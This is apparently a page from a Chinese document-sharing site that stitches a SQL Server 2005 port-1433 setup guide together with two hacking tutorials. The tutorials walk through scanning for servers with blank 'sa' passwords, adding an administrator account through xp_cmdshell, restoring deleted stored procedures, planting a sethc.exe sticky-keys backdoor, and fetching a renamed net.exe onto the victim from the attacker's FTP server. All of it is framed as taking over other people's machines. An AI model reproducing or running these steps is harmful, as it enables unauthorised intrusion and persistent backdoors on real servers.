局域网内找一个机器(非本机),在dos控制台下,输入telnet EP服务器IP 1433
如果安全策略应用成功的话,应该不能够连接,会出现如下的话:正在连接到xxxxxxx...无法打开到主机的连接在端口1433 : 连接失败。

如果应用安全策略失败,则能够连接成功。

【1433端口入侵】

【1433端口入侵】

【1433端口入侵】[删除]图片:图片:[删除]图片:[删除]没什么技术含量,只为新手做个引导.1433端口简介!SQL Server微软出的一款数据库软件,使之客户与主机交流的这么一个程序。

SQL Server使用的1433端口,其中Sa权限为最高权限,我们就是利用肉鸡Sa口令漏洞来入侵的,而一般开1433端口的大多是服务器,所以很受大家的“喜爱”!工具:scannerX-Scan-v3.3SQL综合利用工具在百度搜索,一般都有下载,注意去大型正规网站,并且杀毒!!!需要记住的命令:建立用户net user 帐户密码/add (注意空格,帐户密码自己设置)例如:net user TT86 123 /add (帐户TT86 密码123)把帐户提生为管理员组net localgroup administrators 帐户/add一样:net localgroup administrators TT86 /add (把TT86帐户提升为管理员)正式开始首先,我们用scanner扫描IP,端口设置为1433(看图)将开放1433端口的IP保存,再重新导入scanner扫描3389端口,我们的目的始终利用到3389端口了。

将同时开放1433 3389端口的IP保存起来打开X-Scan-v3.3导入IP参数设置选择几个有用的(看图)扫描结束后点漏洞问题一般会有SQL-Server弱口令:"sa/[空口令]"复制有漏洞的IP打开SQL综合利用工具连接打开利用目录选择执行DOS命令(看图)先执行这个建立用户net user a a /add然后把A用户提生为管理员组net localgroup administrators a /add 自己建立自己的帐号,建立好后会显示执行成功好了,现在我们在肉鸡的电脑里就建立了一个帐户了再就是使用3389端口连接,使用我们刚才建立的帐户登陆吧!其他的放木马什么就不用教了吧!呵呵!就这么简单,祝大家运气好点,顺利的找到肉鸡!。

SQLserver2005-tcp-ip 端口设置启动1433的配置

SQLserver2005-tcp-ip 端口设置启动1433的配置

SQL Server 2005 连接本地端口1433解决方案刚装的SQL server2005数据库,完成后一般无法直接连接端口1433,此时连接一般会失败。

现在把在装完程序后,连接端口1433前,要做的几件事情和注意事项总结一下。

步骤:1.关闭数据库引擎,关闭数据库引擎有三种方法:开始->程序->Microsoft SQL Server 2005->配置工具->SQL Server Configuration Manager,选中SQL Server 2005服务中SQLServer(MSSQLSERVER) ,并选中右击,点击停止,即可关闭数据库引擎。

补充注意点:有时候在启动数据库引擎的时候可能会出现错误,不能启动,这时就要查看"SQL Server 2005配置管理器"中的SQL Server 2005网络配置->MSSQLSERVER协议中的VIA是否已启用,如果已启用,则把它禁止.然后再执行上述一种方式操作就可以了.2.配置服务器端和客户端的TCP/IP协议:配置工具->SQL Server Configuration Manager->MSSQLSERVER的协议看看TCP/IP协议是否启动,如果启动,右键菜单点"属性" ,在分页菜单中选"IP地址",把"IP1"和"IP2"中"TCP端口"为1433,"已启用"改为"是"修改SQL Server的TCP/IP下端口设置,双击“SQL2005的协议”下“TCP/IP”,把“IP地址”下“IPALL”的端口都改为“1433”。

配置工具->SQL Server Configuration Manager->SQL Native Client 配置->客户端协议->TCP/IP选择TCP/IP右键菜单中"属性",确认"默认端口"是1433,"已启用"为"是"3.开启数据库引擎4.连接端口1433开始–>输入cmd –>回车–>telnet localhost 1433->回车出现黑屏,表示本机连接端口1433成功。

  1. 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
  2. 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
  3. 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。

利用SQL之1433端口巧妙入侵服务器
利用1433端口提权
相信大家扫到很多1433 都提示用net net1 提权都说拒绝访问!且又无法上传!今天给大家针对Net 没权限情况的提权方法;
1、未找到储存过程!那就来修复下吧!
用到SQL语句:
xp_cmdshell新的恢复办法
第一步先删除:
drop procedure sp_addextendedproc
drop procedure sp_oacreate
exec sp_dropextendedproc 'xp_cmdshell'
第二步恢复:
dbcc addextendedproc ("sp_oacreate","odsole70.dll")
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")
直接恢复,不管sp_addextendedproc是不是存在
图1
2、修复好了!又出现问题了!xplog70.dll被删除了!看来只有用授鱼的那修复法!图2
3、d:\应用软件\SQLServer2000MicrosoftSQLServer2000SP4简体中文企业光盘版\SP4\x86\binn\xplog70.dLL
找到了哈哈!
图3
4、恢复!
用到SQL语句:
第一
exec sp_dropextendedproc 'xp_cmdshell'
第二
dbcc addextendedproc ("xp_cmdshell","d:\应用软件
\SQLServer2000MicrosoftSQLServer2000SP4简体中文企业光盘版\SP4\x86\binn\xplog70.dLL") 恢复好了
图4
5、提下权net net1 都拒绝访问!管理降低了权限!图5
6、于是我想到了后门提权! 居然管理也注意到了后门!写了权限!
用到CMD命令:
五shift键(前提是能执行DOS命令,并且sethc.exe没加保护)一般只要执行第一步!copy C:\WINDOWS\explorer.exe c:\windows\system32\sethc.exe
copy C:\WINDOWS\explorer.exe c:\windows\system32\dllcache\sethc.exe
图6
7、插入一点:如果DOS不能执行命令的话!那就用SQL执行替换命令!(成功率比较低!)用到SQL语句:
利用SQL分析器开shift后门(一般只要执行第一步!然后进入后,替换自己的后门)第一:
declare @o int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o,
'copyfile',null,'C:\WINDOWS\explorer.exe' ,'c:\windows\system32\sethc.exe';
第二:
declare @oo int
exec sp_oacreate 'scripting.filesystemobject', @oo out
exec sp_oamethod @oo,
'copyfile',null,'c:\windows\system32\sethc.exe' ,'c:\windows\system32\dllcache\sethc.exe'; 图7
8、这里是本节的重点了!利用传马的方式提权!
首先自己架设一个FTP 或是自己已经有FTP的!
把本机的net放到FTP空间里去!随便改个名字!切记不要和net相同即可!
把FTP传马方式的语句一句一句复制执行DOS命令!
用到CMD命令:
echo open FTP> xiuxiu.txt 注意xiuxiu.txt你可以随意改!但是要和下的相同! echo 帐号>> xxxx.txt
echo 密码>> xxxx.txt
echo binary >> xxxx.txt
echo get net的名字.exe>> xxxx.txt
echo bye >> xxxx.txt
ftp -s:xxxx.txt
del xxxx.txt. /q /f
图8
9、好了!执行下最后一条命令! 嘿嘿!发现和FTP抓鸡方式一样!有鸡来下载!图9
10、好了!最后一条命令执行成功了!返回以下数据!
注意:服务器必须能上网!
图10
11、我XXxX 我自己的net好象没加权限吧! 居然不能执行
返回了以下数据!发生系统错误5...这很多人都遇见过!
其实可以省掉一部分! 以后提权传net的时候不要传net 直接net1 因为所以!我也解释不清楚!
图11
12、嘿嘿net1后成功了! 提权成功!图12
13、远程登录成功图13。

相关文档
最新文档